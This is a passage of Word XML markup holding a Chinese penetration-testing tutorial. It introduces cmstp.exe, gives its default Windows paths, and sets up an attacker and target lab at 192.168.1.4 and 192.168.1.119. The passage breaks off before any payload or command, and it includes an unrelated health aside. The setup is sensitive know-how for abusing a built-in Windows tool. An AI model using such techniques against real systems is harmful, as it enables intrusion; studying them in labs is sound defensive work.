,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14866,5457,14865,5457,14865,5457,14865,5457,14865,5457,14865,5457,14864,5457,14864,5457,14864,5457,14864,5457,14863,5457,14863,5457,14862,5457,14862,5457,14862,5457,14861,5457,14861,5457,14860,5457,14859,5457,14859,5457,14858,5457,14858,5457,14857,5457,14856,5457,14855,5457,14854,5457,14854,5457,14853,5457,14852,5457,14851,5457,14850,5457,14849,5457,14848,5457,14846,5457,14845,5457,14844,5457,14843,5457,14841,5457,14840,5457,14838,5457,14837,5457,14835,5457,14834,5457,14832,5457,14830,5457,14829,5457,14827,5457,14825,5457,14823,5457,14821,5457,14819,5457,14817,5457,14815,5457,14812,5457,14810,5457,14808,5457,14805,5457,14803,5457,14800,5457,14797,5457,14795,5457,14792,5457,14789,5457,14786,5457,14783,5457,14780,5457,14777,5457,14774,5457,14770,5457,14767,5457,14763,5457,14760,5457,14756,5457,14752,5457,14749,5457,14745,5457,14741,5457,14737,5457,14733,5457,14728,5457,14724,5457,14720,5457,14715,5457,14711,5457,14706,5457,14701,5457,14696,5457,14691,5457,14686,5457,14681,5457,14676,5457,14670,5457,14665,5457,14659,5457,14654,5457,14648,5457,14642,5457,14636,5457,14630,5457,14624,5457,14618,5457,14611e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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364" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注APT攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请多喝点热水或者凉白开，可预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>肾结石</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>痛风可伴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="25"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cmst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p简介：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1603" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cmstp安装或删除“连接管理器”服务配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>置文件。如果不含可选参数的情况下使用，则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmstp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1991" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>微软官方文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>档：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://docs.micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>osoft.com/en-us/windows-server/administration/windows-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="28"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="27"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ommands/cmstp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="221" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cmstp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.exe所在路径已被系统添加PATH环境变量中，因此，Cmstp命令可识别，需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注意x86，x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64位的Cmstp调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\System32\cmstp.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\SysWOW64\cmstp.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\System32\cmstp.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\SysWOW64\cmstp.exe</w:t>
      </w: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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4121"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.1.119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
